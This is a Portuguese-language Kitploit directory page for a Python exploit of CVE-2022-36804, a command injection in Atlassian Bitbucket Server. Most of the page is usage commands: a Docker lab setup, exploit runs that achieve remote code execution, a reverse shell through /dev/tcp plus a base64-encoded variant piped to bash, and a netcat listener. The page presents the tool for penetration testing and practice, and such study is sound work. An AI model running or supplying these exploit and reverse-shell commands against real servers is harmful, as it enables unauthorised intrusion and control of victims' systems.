Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 — Exploit em Python para injeção de comando CVE-2022-36804 no Atlassian Bitbucket Server, permitindo execução remota de código e shell reverso com comandos personalizáveis e ambiente de laboratório Docker. | Kitploit
Ferramentas/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleLabs e Prática
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Exploit em Python para injeção de comando CVE-2022-36804 no Atlassian Bitbucket Server, permitindo execução remota de código e shell reverso com comandos personalizáveis e ambiente de laboratório Docker.

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Atlassian-Bitbucket-Server-CVE-2022-36804

Uma vulnerabilidade crítica de injeção de comandos foi encontrada em vários endpoints da API do Atlassian Bit bucket Server e Data center. Esta vulnerabilidade afeta todas as versões do Bitbucket Server e Data Center lançadas antes das versões <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> e <8.3.1>

Laboratório para CVE-2022-36804

Construir Docker

root@kitploit:~
docker build -t bitbucket .

Executar Docker

root@kitploit:~
docker run -it bitbucket

Uso cve-2022-36804.py

Verificar Execução Remota de Código (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Verificar RCE com comando personalizado (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Verificar RCE com comando personalizado, chave do projeto e nome do repositório

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Obter shell com netcat

Substitua 172.17.0.3 pelo seu endereço IP local

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Inicie o netcat listner com:

root@kitploit:~
nc -lvp 4444

Reverse shell online : https://www.revshells.com

root@kitploit:~
Converta `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` para base64 em caso de erro de execução do payload.

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Recomenda-se instalar uma versão vulnerável do Bitbucket Server em máquina Windows/Linux para prática. Será mais fácil obter um reverse shell em comparação com imagens Docker.

Mais informações podem ser encontradas [aqui](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Referências
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Baixar ferramenta